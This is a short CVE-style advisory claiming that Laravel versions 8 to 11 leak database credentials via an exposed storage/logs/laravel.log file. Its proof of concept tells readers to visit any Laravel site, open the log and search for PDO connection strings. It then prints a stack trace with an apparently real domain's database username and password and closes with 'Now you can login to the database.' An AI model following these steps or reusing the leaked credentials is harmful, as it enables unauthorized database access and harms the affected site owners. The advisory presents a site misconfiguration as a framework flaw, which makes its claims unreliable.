CVE-2024-29291

CVE-ID: CVE-2024-29291

Description:

A vulnerability has been discovered in the Laravel Framework in versions from 8.* to 11.*, allowing a remote attacker to obtain sensitive information via the laravel.log component. This vulnerability leads to the leakage of database credentials.

Additional Information:

None.

Risk:

High.

Vulnerability Type:

Database credential leak vulnerability.

Vendor of Product:

Laravel Framework.

Affected Product Code Base:

Laravel FRAMEWORK - 8.* - 11.*

Affected Component:

laravel.log.

Attack Type:

Remote.

Impact Information Disclosure:

True.

Attack Vectors:

Database credential leak vulnerability.

Description:

Access to private Database credential data is possible by logging into the website database. Additionally, login data for database access can be retrieved.

Proof of concept:

Go to any Laravel-based website and navigate to storage/logs/laravel.log.
Open the file and search for "PDO->__construct('mysql:host=".
The result:
shell
Copy code
#0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
#1 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
Credentials:

Username: u429384055_jscv
Password: Jaly$$a0p0p0p0

Host: sql1...

Now you can login to the database.

By: Huseein Amer
Facebook: https://www.facebook.com/hussein.amer.75491/